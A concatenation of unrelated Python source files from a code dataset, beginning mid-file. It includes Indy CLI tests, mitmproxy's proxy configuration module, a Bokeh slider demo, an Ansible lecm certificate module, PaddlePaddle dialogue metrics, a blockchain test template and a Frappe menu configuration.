@pytest.mark.skip(reason="SOV-568. Obsolete assumption, if an identity has set "
"its verkey to blank, no-one including "
"itself can change it")
def testNewverkeyAddedToDID(be, do, philCli, abbrevIdr,
verkeyRemovedFromExistingDID):
newSigner = DidSigner()
addNym(be, do, philCli, abbrevIdr, newSigner.verkey)
getNym(be, do, philCli, abbrevIdr,
getCurrentVerkeyIsgMsgs(abbrevIdr, newSigner.verkey))
@pytest.mark.skip(reason="SOV-568. Obsolete assumption, if an identity has set "
"its verkey to blank, no-one including "
"itself can change it")
def testNewverkeyAddedToCID(be, do, philCli, trustAnchorSigner,
verkeyRemovedFromExistingCID):
newSigner = DidSigner()
addNym(be, do, philCli, trustAnchorSigner.identifier, newSigner.verkey)
getNym(be, do, philCli, trustAnchorSigner.identifier,
getCurrentVerkeyIsgMsgs(trustAnchorSigner.identifier, newSigner.verkey))
def testNewKeyChangesWalletsDefaultId(be, do, poolNodesStarted,
susanCLI, connectedToTest):
mywallet = Wallet('my wallet')
keyseed = 'a' * 32
idr, _ = mywallet.addIdentifier(seed=keyseed.encode("utf-8"))
be(susanCLI)
do('connect test', within=3, expect=connectedToTest)
do('new key with seed {}'.format(keyseed))
do('send NYM dest={}'.format(idr))
do('new key with seed 11111111111111111111111111111111')
do('send NYM dest={}'.format(idr), within=3,
expect=["Nym {} added".format(idr)])
|
py | 7df9e692971c6f5f7a3ccd646b60692c6368759e | import base64
import collections
import os
import re
from typing import Any
from mitmproxy.utils import strutils
from OpenSSL import SSL, crypto
from mitmproxy import exceptions
from mitmproxy import options as moptions
from mitmproxy import certs
from mitmproxy.net import tcp
from mitmproxy.net.http import authentication
from mitmproxy.net.http import url
CONF_BASENAME = "mitmproxy"
class HostMatcher:
def __init__(self, patterns=tuple()):
self.patterns = list(patterns)
self.regexes = [re.compile(p, re.IGNORECASE) for p in self.patterns]
def __call__(self, address):
if not address:
return False
address = tcp.Address.wrap(address)
host = "%s:%s" % (address.host, address.port)
if any(rex.search(host) for rex in self.regexes):
return True
else:
return False
def __bool__(self):
return bool(self.patterns)
ServerSpec = collections.namedtuple("ServerSpec", "scheme address")
def parse_server_spec(spec):
try:
p = url.parse(spec)
if p[0] not in (b"http", b"https"):
raise ValueError()
except ValueError:
raise exceptions.OptionsError(
"Invalid server specification: %s" % spec
)
host, port = p[1:3]
address = tcp.Address((host.decode("ascii"), port))
scheme = p[0].decode("ascii").lower()
return ServerSpec(scheme, address)
def parse_upstream_auth(auth):
pattern = re.compile(".+:")
if pattern.search(auth) is None:
raise exceptions.OptionsError(
"Invalid upstream auth specification: %s" % auth
)
return b"Basic" + b" " + base64.b64encode(strutils.always_bytes(auth))
class ProxyConfig:
def __init__(self, options: moptions.Options):
self.options = options
self.authenticator = None
self.check_ignore = None
self.check_tcp = None
self.certstore = None
self.clientcerts = None
self.openssl_verification_mode_server = None
self.configure(options, set(options.keys()))
options.changed.connect(self.configure)
def configure(self, options: moptions.Options, updated: Any) -> None:
if options.add_upstream_certs_to_client_chain and not options.ssl_insecure:
raise exceptions.OptionsError(
"The verify-upstream-cert requires certificate verification to be disabled. "
"If upstream certificates are verified then extra upstream certificates are "
"not available for inclusion to the client chain."
)
if options.ssl_insecure:
self.openssl_verification_mode_server = SSL.VERIFY_NONE
else:
self.openssl_verification_mode_server = SSL.VERIFY_PEER
self.check_ignore = HostMatcher(options.ignore_hosts)
self.check_tcp = HostMatcher(options.tcp_hosts)
self.openssl_method_client, self.openssl_options_client = \
tcp.sslversion_choices[options.ssl_version_client]
self.openssl_method_server, self.openssl_options_server = \
tcp.sslversion_choices[options.ssl_version_server]
certstore_path = os.path.expanduser(options.cadir)
if not os.path.exists(os.path.dirname(certstore_path)):
raise exceptions.OptionsError(
"Certificate Authority parent directory does not exist: %s" %
os.path.dirname(options.cadir)
)
self.certstore = certs.CertStore.from_store(
certstore_path,
CONF_BASENAME
)
if options.clientcerts:
clientcerts = os.path.expanduser(options.clientcerts)
if not os.path.exists(clientcerts):
raise exceptions.OptionsError(
"Client certificate path does not exist: %s" %
options.clientcerts
)
self.clientcerts = clientcerts
for spec, cert in options.certs:
cert = os.path.expanduser(cert)
if not os.path.exists(cert):
raise exceptions.OptionsError(
"Certificate file does not exist: %s" % cert
)
try:
self.certstore.add_cert_file(spec, cert)
except crypto.Error:
raise exceptions.OptionsError(
"Invalid certificate format: %s" % cert
)
self.upstream_server = None
self.upstream_auth = None
if options.upstream_server:
self.upstream_server = parse_server_spec(options.upstream_server)
if options.upstream_auth:
self.upstream_auth = parse_upstream_auth(options.upstream_auth)
self.authenticator = authentication.NullProxyAuth(None)
needsauth = any(
[
options.auth_nonanonymous,
options.auth_singleuser,
options.auth_htpasswd
]
)
if needsauth:
if options.mode == "transparent":
raise exceptions.OptionsError(
"Proxy Authentication not supported in transparent mode."
)
elif options.mode == "socks5":
raise exceptions.OptionsError(
"Proxy Authentication not supported in SOCKS mode. "
"https://github.com/mitmproxy/mitmproxy/issues/738"
)
elif options.auth_singleuser:
parts = options.auth_singleuser.split(':')
if len(parts) != 2:
raise exceptions.OptionsError(
"Invalid single-user specification. "
"Please use the format username:password"
)
password_manager = authentication.PassManSingleUser(*parts)
elif options.auth_nonanonymous:
password_manager = authentication.PassManNonAnon()
elif options.auth_htpasswd:
try:
password_manager = authentication.PassManHtpasswd(
options.auth_htpasswd
)
except ValueError as v:
raise exceptions.OptionsError(str(v))
if options.mode == "reverse":
self.authenticator = authentication.BasicWebsiteAuth(
password_manager,
self.upstream_server.address
)
else:
self.authenticator = authentication.BasicProxyAuth(
password_manager,
"mitmproxy"
)
|
py | 7df9e7a64233624f61e8eb278b9e30efa25c112b | str1 = input()
str2 = input()
goal = input()
# Build a substitution table: the i-th character of str2 maps to the i-th
# character of str1; only the first occurrence of a character in str2 is kept.
d = {}
l = list(str1)
l2 = list(str2)
for i in range(len(l2)):
    if l2[i] not in d:
        d[l2[i]] = l[i]
# Decode `goal` through the table, printing '.' for characters with no mapping.
for x in range(len(goal)):
    if goal[x] in d:
        print(d[goal[x]], end="")
    else:
        print(".", end="")
|
py | 7df9e88c3519949065edda03cbbd68120a7de923 | import numpy as np
from bokeh.layouts import row, widgetbox
from bokeh.models import CustomJS, Slider
from bokeh.plotting import figure, output_file, show, ColumnDataSource
x = np.linspace(0, 10, 500)
y = np.sin(x)
source = ColumnDataSource(data=dict(x=x, y=y))
plot = figure(y_range=(-10, 10), plot_width=400, plot_height=400)
plot.line('x', 'y', source=source, line_width=3, line_alpha=0.6)
callback = CustomJS(args=dict(source=source), code="""
var data = source.data;
var A = amp.value;
var k = freq.value;
var phi = phase.value;
var B = offset.value;
x = data['x']
y = data['y']
for (i = 0; i < x.length; i++) {
y[i] = B + A*Math.sin(k*x[i]+phi);
}
source.change.emit();
""")
amp_slider = Slider(start=0.1, end=10, value=1, step=.1,
title="Amplitude", callback=callback)
callback.args["amp"] = amp_slider
freq_slider = Slider(start=0.1, end=10, value=1, step=.1,
title="Frequency", callback=callback)
callback.args["freq"] = freq_slider
phase_slider = Slider(start=0, end=6.4, value=0, step=.1,
title="Phase", callback=callback)
callback.args["phase"] = phase_slider
offset_slider = Slider(start=-5, end=5, value=0, step=.1,
title="Offset", callback=callback)
callback.args["offset"] = offset_slider
layout = row(
plot,
widgetbox(amp_slider, freq_slider, phase_slider, offset_slider),
)
output_file("slider.html", title="slider.py example")
show(layout)
|
py | 7df9eb0e53e42636234e9280891099792786c1fc | # *** WARNING: this file was generated by the Kulado Kubernetes codegen tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import kulado
import kulado.runtime
import warnings
from ... import tables, version
class CronJobList(kulado.CustomResource):
"""
CronJobList is a collection of cron jobs.
"""
def __init__(self, resource_name, opts=None, items=None, metadata=None, __name__=None, __opts__=None):
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if not resource_name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(resource_name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, kulado.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
__props__['apiVersion'] = 'batch/v1beta1'
__props__['kind'] = 'CronJobList'
if items is None:
raise TypeError('Missing required property items')
__props__['items'] = items
__props__['metadata'] = metadata
if opts is None:
opts = kulado.ResourceOptions()
if opts.version is None:
opts.version = version.get_version()
super(CronJobList, self).__init__(
"kubernetes:batch/v1beta1:CronJobList",
resource_name,
__props__,
opts)
def translate_output_property(self, prop: str) -> str:
return tables._CASING_FORWARD_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return tables._CASING_BACKWARD_TABLE.get(prop) or prop
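# Illustrative usage of CronJobList (a sketch; resource name and metadata values are made up):
#   cron_jobs = CronJobList(
#       "my-cron-jobs",
#       items=[],                              # list of CronJob definitions
#       metadata={"name": "my-cron-jobs"},
#   )
# The constructor fills in apiVersion='batch/v1beta1' and kind='CronJobList' automatically.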
|
py | 7df9eb1fdbf3645340a1ffeb8e4a699988cd83db | import pytest
from pytest_bdd import scenarios
pytestmark = [
pytest.mark.bdd,
pytest.mark.usefixtures('workbook', 'admin_user'),
]
scenarios(
'forms.feature',
'page.feature',
strict_gherkin=False,
)
|
py | 7df9ebbe6465386d6a36dd59638de04d84842b7d | #!/usr/bin/python
# Copyright 2016 Yanis Guenane <[email protected]>
# Author: Yanis Guenane <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import os
from ansible.module_utils.basic import *
try:
import yaml
except ImportError:
pyyaml_found = False
else:
pyyaml_found = True
_PROPERTIES = ['type', 'size', 'digest', 'version', 'subjectAltName',
'countryName', 'stateOrProvinceName', 'localityName',
'organizationName', 'organizationUnitName', 'commonName',
'emailAddress', 'account_key_name', 'path', 'remaining_days',
'service_name', 'service_provider']
DOCUMENTATION = '''
---
module: lecm_certificate
short_description: An Ansible module to manage lecm certificates in the configuration file
version_added: 2.2
options:
state:
required: false
choices: ['present', 'absent']
default: 'present'
    description: Whether or not the certificate should be present
config:
required: false
description: Path of the lecm config file, if not using the default
name:
required: true
    description: Name of the SSL certificate
path:
    required: false
    description: Path of the certificate on the local filesystem
'''
EXAMPLES = '''
- name: Create a SSL certificate
lecm_certificate:
config: /etc/lecm.conf
name: lecm.example.com
- name: Remove a SSL certificate
lecm_certificate:
config: /etc/lecm.conf
name: lecm.example.com
state: absent
'''
RETURN = '''
name:
description: Name of the SSL certificate
type: string
sample: lecm.example.com
path:
    description: Path of the SSL certificate on the local filesystem
    type: string
    sample: /etc/lecm/lecm.example.com.crt
'''
class Certificate(object):
def __init__(self, module):
self.state = module.params['state']
self.config = module.params['config']
self.name = module.params['name']
self.changed = True
self.type = module.params['type']
self.size = module.params['size']
self.digest = module.params['digest']
self.version = module.params['version']
self.subjectAltName = module.params['subjectAltName']
self.countryName = module.params['countryName']
self.stateOrProvinceName = module.params['stateOrProvinceName']
self.localityName = module.params['localityName']
self.organizationName = module.params['organizationName']
self.organizationUnitName = module.params['organizationUnitName']
self.commonName = module.params['commonName']
self.emailAddress = module.params['emailAddress']
self.account_key_name = module.params['account_key_name']
self.remaining_days = module.params['remaining_days']
self.service_name = module.params['service_name']
self.service_provider = module.params['service_provider']
self.path = module.params['path']
def write(self):
l_certificate = {}
for prop in _PROPERTIES:
if getattr(self, prop):
l_certificate[prop] = getattr(self, prop)
try:
lecm_conf = yaml.load(open(self.config, 'r'))
except:
lecm_conf = {}
if lecm_conf is None:
lecm_conf = {}
certificates = {}
c_certificate = None
try:
current_certificates = copy.deepcopy(lecm_conf['certificates'])
for certificate, parameters in current_certificates.items():
if 'name' in parameters:
certificate_name = parameters['name']
else:
certificate_name = certificate
if certificate_name != self.name:
certificates[certificate_name] = parameters
else:
c_certificate = parameters
except KeyError:
pass
if c_certificate == l_certificate:
self.changed = False
else:
certificates[self.name] = l_certificate
lecm_conf['certificates'] = copy.deepcopy(certificates)
with open(self.config, 'w') as conf_file:
conf_file.write(
yaml.dump(
lecm_conf, explicit_start=True, default_flow_style=False
)
)
def remove(self):
# Not Implemented yet
pass
def dump(self):
return {'name': self.name, 'changed': self.changed}
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
config=dict(required=False, type='path', default='/etc/lecm.conf'),
name=dict(type='str'),
type=dict(required=False, type='str'),
size=dict(required=False, type='int'),
digest=dict(required=False, type='str'),
version=dict(required=False, type='int'),
subjectAltName=dict(required=False, type='list'),
countryName=dict(required=False, type='str'),
stateOrProvinceName=dict(required=False, type='str'),
localityName=dict(required=False, type='str'),
organizationName=dict(required=False, type='str'),
organizationUnitName=dict(required=False, type='str'),
commonName=dict(required=False, type='str'),
emailAddress=dict(required=False, type='str'),
account_key_name=dict(required=False, type='str'),
path=dict(required=False, type='path'),
remaining_days=dict(required=False, type='int'),
service_name=dict(required=False, type='str'),
service_provider=dict(required=False, default='systemd', choices=['systemd', 'sysv'], type='str'),
),
)
if not pyyaml_found:
module.fail_json(msg='the python PyYAML module is required')
path = os.path.dirname(module.params['config'])
if not os.path.isdir(path):
module.fail_json(name=path, msg='Directory %s does not exist' % path)
certificate = Certificate(module)
if certificate.state == 'present':
certificate.write()
else:
certificate.remove()
result = certificate.dump()
module.exit_json(**result)
if __name__ == '__main__':
main()
|
py | 7df9ebcc0f859e97889cf999c299e8e3a450e550 | #!/Users/Marisa/Sites/zwazo/venv/bin/python3
# Author:
# Contact: [email protected]
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
|
py | 7df9ec3605775a499ccc04182eeeb6f0c7dd6261 | import numpy as np
import paddle
import paddle.nn as nn
from paddle.metric import Metric
class RecallAtK(Metric):
"""
    Recall@K is the fraction of relevant results among the retrieved top-K
    results, used to evaluate the performance of Dialogue Response Selection.
    Note that this class manages the Recall@K score only for the binary
    classification task.
"""
def __init__(self, name='Recall@K', *args, **kwargs):
super(RecallAtK, self).__init__(*args, **kwargs)
self._name = name
self.softmax = nn.Softmax()
self.reset()
def reset(self):
"""
Resets all of the metric state.
"""
self.num_sampls = 0
self.p_at_1_in_10 = 0.0
self.p_at_2_in_10 = 0.0
self.p_at_5_in_10 = 0.0
def get_p_at_n_in_m(self, data, n, m, idx):
"""
        Return 1 if the positive example at index `idx` is ranked within the
        top n of the m candidates starting at `idx`, otherwise return 0.
"""
pos_score = data[idx][0]
curr = data[idx:idx + m]
curr = sorted(curr, key=lambda x: x[0], reverse=True)
if curr[n - 1][0] <= pos_score:
return 1
return 0
def update(self, logits, labels):
"""
Update the states based on the current mini-batch prediction results.
Args:
logits (Tensor): The predicted value is a Tensor with
shape [batch_size, 2] and type float32 or float64.
labels (Tensor): The ground truth value is a 2D Tensor,
its shape is [batch_size, 1] and type is int64.
"""
probs = self.softmax(logits)
probs = probs.numpy()
labels = labels.numpy()
assert probs.shape[0] == labels.shape[0]
data = []
for prob, label in zip(probs, labels):
data.append((prob[1], label))
assert len(data) % 10 == 0
length = int(len(data) / 10)
self.num_sampls += length
for i in range(length):
idx = i * 10
assert data[idx][1] == 1
self.p_at_1_in_10 += self.get_p_at_n_in_m(data, 1, 10, idx)
self.p_at_2_in_10 += self.get_p_at_n_in_m(data, 2, 10, idx)
self.p_at_5_in_10 += self.get_p_at_n_in_m(data, 5, 10, idx)
def accumulate(self):
"""
Calculate the final Recall@K.
Returns:
A list with scaler float: results of the calculated R1@K, R2@K, R5@K.
"""
metrics_out = [
self.p_at_1_in_10 / self.num_sampls, self.p_at_2_in_10 /
self.num_sampls, self.p_at_5_in_10 / self.num_sampls
]
return metrics_out
def name(self):
"""
Returns metric name
"""
return self._name
class JointAccuracy(Metric):
"""
The joint accuracy rate is used to evaluate the performance of multi-turn
    Dialogue State Tracking. For each turn, the dialog state prediction is
    considered correct if and only if all states in state_list are correctly
    predicted; in that case the joint accuracy for the turn is 1, otherwise
    it is 0.
"""
def __init__(self, name='JointAccuracy', *args, **kwargs):
super(JointAccuracy, self).__init__(*args, **kwargs)
self._name = name
self.sigmoid = nn.Sigmoid()
self.reset()
def reset(self):
"""
Resets all of the metric state.
"""
self.num_samples = 0
self.correct_joint = 0.0
def update(self, logits, labels):
"""
Update the states based on the current mini-batch prediction results.
Args:
logits (Tensor): The predicted value is a Tensor with
shape [batch_size, num_classes] and type float32 or float64.
labels (Tensor): The ground truth value is a 2D Tensor,
its shape is [batch_size, num_classes] and type is int64.
"""
probs = self.sigmoid(logits)
probs = probs.numpy()
labels = labels.numpy()
assert probs.shape[0] == labels.shape[0]
assert probs.shape[1] == labels.shape[1]
for i in range(probs.shape[0]):
pred, refer = [], []
for j in range(probs.shape[1]):
if probs[i][j] >= 0.5:
pred.append(j)
if labels[i][j] == 1:
refer.append(j)
if not pred:
pred = [np.argmax(probs[i])]
if pred == refer:
self.correct_joint += 1
self.num_samples += probs.shape[0]
def accumulate(self):
"""
Calculate the final JointAccuracy.
Returns:
A scaler float: results of the calculated JointAccuracy.
"""
joint_acc = self.correct_joint / self.num_samples
return joint_acc
def name(self):
"""
Returns metric name
"""
return self._name
class F1Score(Metric):
"""
    F1-score is the harmonic mean of precision and recall. Micro-averaging
    builds a global confusion matrix over all examples and then calculates
    the F1-score from it. This class is used to evaluate the performance of
    Dialogue Slot Filling.
"""
def __init__(self, name='F1Score', *args, **kwargs):
super(F1Score, self).__init__(*args, **kwargs)
self._name = name
self.reset()
def reset(self):
"""
Resets all of the metric state.
"""
self.tp = {}
self.fn = {}
self.fp = {}
def update(self, logits, labels):
"""
Update the states based on the current mini-batch prediction results.
Args:
logits (Tensor): The predicted value is a Tensor with
shape [batch_size, seq_len, num_classes] and type float32 or
float64.
labels (Tensor): The ground truth value is a 2D Tensor,
its shape is [batch_size, seq_len] and type is int64.
"""
probs = paddle.argmax(logits, axis=-1)
probs = probs.numpy()
labels = labels.numpy()
assert probs.shape[0] == labels.shape[0]
assert probs.shape[1] == labels.shape[1]
for i in range(probs.shape[0]):
start, end = 1, probs.shape[1]
while end > start:
if labels[i][end - 1] != 0:
break
end -= 1
prob, label = probs[i][start:end], labels[i][start:end]
for y_pred, y in zip(prob, label):
if y_pred == y:
self.tp[y] = self.tp.get(y, 0) + 1
else:
self.fp[y_pred] = self.fp.get(y_pred, 0) + 1
self.fn[y] = self.fn.get(y, 0) + 1
def accumulate(self):
"""
Calculate the final micro F1 score.
Returns:
A scaler float: results of the calculated micro F1 score.
"""
tp_total = sum(self.tp.values())
fn_total = sum(self.fn.values())
fp_total = sum(self.fp.values())
p_total = float(tp_total) / (tp_total + fp_total)
r_total = float(tp_total) / (tp_total + fn_total)
if p_total + r_total == 0:
return 0
f1_micro = 2 * p_total * r_total / (p_total + r_total)
return f1_micro
def name(self):
"""
Returns metric name
"""
return self._name
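# Illustrative usage of the metrics above (a sketch with made-up tensors, not part of the original file):
#   metric = RecallAtK()
#   logits = paddle.rand([20, 2])                                   # scores for 2 groups of 10 candidates
#   labels = paddle.to_tensor([[1]] + [[0]] * 9 + [[1]] + [[0]] * 9)
#   metric.update(logits, labels)
#   r1, r2, r5 = metric.accumulate()                                # Recall@1, Recall@2, Recall@5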
|
py | 7df9ece02d276513adf05e134a7f57cbda0d14f8 | #!/usr/bin/env python3
# Copyright (c) 2017-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
"""An example functional test
The module-level docstring should include a high-level description of
what the test is doing. It's the first thing people see when they open
the file and should give the reader information about *what* the test
is testing and *how* it's being tested
"""
# Imports should be in PEP8 ordering (std library first, then third party
# libraries then local imports).
from collections import defaultdict
# Avoid wildcard * imports
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.messages import CInv
from test_framework.mininode import (
P2PInterface,
mininode_lock,
msg_block,
msg_getdata,
)
from test_framework.test_framework import DefiTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
wait_until,
)
# P2PInterface is a class containing callbacks to be executed when a P2P
# message is received from the node-under-test. Subclass P2PInterface and
# override the on_*() methods if you need custom behaviour.
class BaseNode(P2PInterface):
def __init__(self):
"""Initialize the P2PInterface
Used to initialize custom properties for the Node that aren't
included by default in the base class. Be aware that the P2PInterface
base class already stores a counter for each P2P message type and the
last received message of each type, which should be sufficient for the
needs of most tests.
Call super().__init__() first for standard initialization and then
initialize custom properties."""
super().__init__()
# Stores a dictionary of all blocks received
self.block_receive_map = defaultdict(int)
def on_block(self, message):
"""Override the standard on_block callback
Store the hash of a received block in the dictionary."""
message.block.calc_sha256()
self.block_receive_map[message.block.sha256] += 1
def on_inv(self, message):
"""Override the standard on_inv callback"""
pass
def custom_function():
"""Do some custom behaviour
If this function is more generally useful for other tests, consider
moving it to a module in test_framework."""
# self.log.info("running custom_function") # Oops! Can't run self.log outside the DefiTestFramework
pass
class ExampleTest(DefiTestFramework):
# Each functional test is a subclass of the DefiTestFramework class.
# Override the set_test_params(), skip_test_if_missing_module(), add_options(), setup_chain(), setup_network()
# and setup_nodes() methods to customize the test setup as required.
def set_test_params(self):
"""Override test parameters for your individual test.
This method must be overridden and num_nodes must be explicitly set."""
self.setup_clean_chain = True
self.num_nodes = 3
# Use self.extra_args to change command-line arguments for the nodes
self.extra_args = [[], ["-logips"], []]
# self.log.info("I've finished set_test_params") # Oops! Can't run self.log before run_test()
# Use skip_test_if_missing_module() to skip the test if your test requires certain modules to be present.
# This test uses generate which requires wallet to be compiled
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
# Use add_options() to add specific command-line options for your test.
# In practice this is not used very much, since the tests are mostly written
# to be run in automated environments without command-line options.
# def add_options()
# pass
# Use setup_chain() to customize the node data directories. In practice
# this is not used very much since the default behaviour is almost always
# fine
# def setup_chain():
# pass
def setup_network(self):
"""Setup the test network topology
Often you won't need to override this, since the standard network topology
(linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests.
If you do override this method, remember to start the nodes, assign
them to self.nodes, connect them and then sync."""
self.setup_nodes()
# In this test, we're not connecting node2 to node0 or node1. Calls to
# sync_all() should not include node2, since we're not expecting it to
# sync.
connect_nodes(self.nodes[0], 1)
self.sync_all(self.nodes[0:2])
# Use setup_nodes() to customize the node start behaviour (for example if
# you don't want to start all nodes at the start of the test).
# def setup_nodes():
# pass
def custom_method(self):
"""Do some custom behaviour for this test
Define it in a method here because you're going to use it repeatedly.
If you think it's useful in general, consider moving it to the base
DefiTestFramework class so other tests can use it."""
self.log.info("Running custom_method")
def run_test(self):
"""Main test logic"""
        # Creating a P2P connection will wait for a verack to make sure the connection is fully up
self.nodes[0].add_p2p_connection(BaseNode())
# Generating a block on one of the nodes will get us out of IBD
blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)]
self.sync_all(self.nodes[0:2])
# Notice above how we called an RPC by calling a method with the same
# name on the node object. Notice also how we used a keyword argument
# to specify a named RPC argument. Neither of those are defined on the
# node object. Instead there's some __getattr__() magic going on under
# the covers to dispatch unrecognised attribute calls to the RPC
# interface.
# Logs are nice. Do plenty of them. They can be used in place of comments for
# breaking the test into sub-sections.
self.log.info("Starting test!")
self.log.info("Calling a custom function")
custom_function()
self.log.info("Calling a custom method")
self.custom_method()
self.log.info("Create some blocks")
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
height = self.nodes[0].getblockcount()
for i in range(10):
# Use the mininode and blocktools functionality to manually build a block
# Calling the generate() rpc is easier, but this allows us to exactly
# control the blocks and transactions.
block = create_block(self.tip, create_coinbase(height+1), self.block_time)
block.solve()
block_message = msg_block(block)
# Send message is used to send a P2P message to the node over our P2PInterface
self.nodes[0].p2p.send_message(block_message)
self.tip = block.sha256
blocks.append(self.tip)
self.block_time += 1
height += 1
self.log.info("Wait for node1 to reach current tip (height 11) using RPC")
self.nodes[1].waitforblockheight(11)
self.log.info("Connect node2 and node1")
connect_nodes(self.nodes[1], 2)
self.log.info("Wait for node2 to receive all the blocks from node1")
self.sync_all()
self.log.info("Add P2P connection to node2")
self.nodes[0].disconnect_p2ps()
self.nodes[2].add_p2p_connection(BaseNode())
self.log.info("Test that node2 propagates all the blocks to us")
getdata_request = msg_getdata()
for block in blocks:
getdata_request.inv.append(CInv(2, block))
self.nodes[2].p2p.send_message(getdata_request)
# wait_until() will loop until a predicate condition is met. Use it to test properties of the
# P2PInterface objects.
wait_until(lambda: sorted(blocks) == sorted(list(self.nodes[2].p2p.block_receive_map.keys())), timeout=5, lock=mininode_lock)
self.log.info("Check that each block was received only once")
# The network thread uses a global lock on data access to the P2PConnection objects when sending and receiving
# messages. The test thread should acquire the global lock before accessing any P2PConnection data to avoid locking
# and synchronization issues. Note wait_until() acquires this global lock when testing the predicate.
with mininode_lock:
for block in self.nodes[2].p2p.block_receive_map.values():
assert_equal(block, 1)
if __name__ == '__main__':
ExampleTest().main()
|
py | 7df9ed3eae0586aa8b93e01c3db046cbc0ecf51c | from frappe import _
def get_data():
return [
{
"label": _("Purchasing"),
"icon": "fa fa-star",
"items": [
{
"type": "doctype",
"name": "Material Request",
"description": _("Request for purchase."),
},
{
"type": "doctype",
"name": "Request for Quotation",
"description": _("Request for quotation."),
},
{
"type": "doctype",
"name": "Supplier Quotation",
"description": _("Quotations received from Suppliers."),
},
{
"type": "doctype",
"name": "Purchase Order",
"description": _("Purchase Orders given to Suppliers."),
},
{
"type": "doctype",
"name": "Order Tracking",
"description": _("Track orders from Suppliers."),
},
{
"type": "doctype",
"name": "Product Quality Inspection",
"label": _("Order Inspection")
},
{
"type": "doctype",
"name": "Purchase Receipt",
},
]
},
{
"label": _("Stock Management"),
"items": [
{
"type": "doctype",
"name": "Stock Entry",
},
{
"type": "doctype",
"name": "Stock Transport",
},
{
"type": "report",
"is_query_report": True,
"name": "Stock Ledger",
"doctype": "Stock Ledger Entry",
},
]
},
{
"label": _("Supplier"),
"items": [
{
"type": "doctype",
"name": "Supplier",
"description": _("Supplier database."),
},
{
"type": "doctype",
"name": "Supplier Type",
"description": _("Supplier Type master.")
},
{
"type": "doctype",
"name": "Project",
"label": _("Projects"),
"description": _("Supplier Type master.")
},
]
},
{
"label": _("Items and Pricing"),
"items": [
{
"type": "doctype",
"name": "Item",
},
{
"type": "doctype",
"name": "Product Bundle",
},
{
"type": "doctype",
"name": "Item Price",
"route": "Report/Item Price",
},
{
"type": "doctype",
"name": "Serial No",
},
{
"type": "doctype",
"name": "Past Serial No",
"description": _("Past Serial No."),
}
]
},
{
"label": _("Purchase Reports"),
"icon": "fa fa-list",
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Items To Be Requested"
},
{
"type": "report",
"is_query_report": True,
"name": "Reordering Items"
},
{
"type": "report",
"is_query_report": True,
"name": "Pending Ordered Items"
},
{
"type": "report",
"is_query_report": True,
"name": "Purchase History"
},
{
"type": "report",
"is_query_report": True,
"name": "Pending Requests"
},
{
"type": "report",
"is_query_report": True,
"name": "Shipment Tracking",
"doctype": "Order Tracking",
},
{
"type": "report",
"is_query_report": True,
"name": "Costing Report",
"doctype": "Landed Cost Voucher",
},
{
"type": "report",
"is_query_report": True,
"name": "Supplier Contacts",
"label": "Supplier Contacts",
"doctype": "Address",
"route_options": {
"party_type": "Supplier"
}
},
]
},
{
"label": _("Stock Reports"),
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Stock Balance",
"doctype": "Stock Ledger Entry"
},
{
"type": "report",
"is_query_report": True,
"name": "Stock Projected Qty",
"doctype": "Item",
},
{
"type": "page",
"name": "stock-balance",
"label": _("Stock Summary")
},
{
"type": "report",
"is_query_report": True,
"name": "Stock Ageing",
"doctype": "Item",
},
{
"type": "report",
"is_query_report": True,
"name": "Ordered Items To Be Delivered",
"doctype": "Delivery Note"
},
{
"type": "report",
"name": "Item Shortage Report",
"route": "Report/Bin/Item Shortage Report",
"doctype": "Purchase Receipt"
},
{
"type": "report",
"is_query_report": True,
"name": "Requested Items To Be Transferred",
"doctype": "Material Request"
},
{
"type": "report",
"is_query_report": True,
"name": "Itemwise Recommended Reorder Level",
"doctype": "Item"
},
]
},
{
"label": _("Purchase Analytics"),
"icon": "fa fa-table",
"items": [
{
"type": "page",
"name": "purchase-analytics",
"label": _("Purchase Analytics"),
"icon": "fa fa-bar-chart",
},
{
"type": "report",
"is_query_report": True,
"name": "Purchase Order Trends",
"doctype": "Purchase Order"
},
{
"type": "report",
"is_query_report": True,
"name": "Purchase Receipt Trends",
"doctype": "Purchase Receipt"
},
]
},
{
"label": _("Stock Analytics"),
"icon": "fa fa-table",
"items": [
{
"type": "page",
"name": "stock-analytics",
"label": _("Stock Analytics"),
"icon": "fa fa-bar-chart"
},
{
"type": "doctype",
"name": "Bin Setup",
"description": _("Bin Setup for warehouse")
},
]
},
]
|
py | 7df9ed8972cbad5bb2c25911600cd50a8f4ea353 | #-----------------------------------------------------------------------------
# Copyright (c) 2013-2017, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
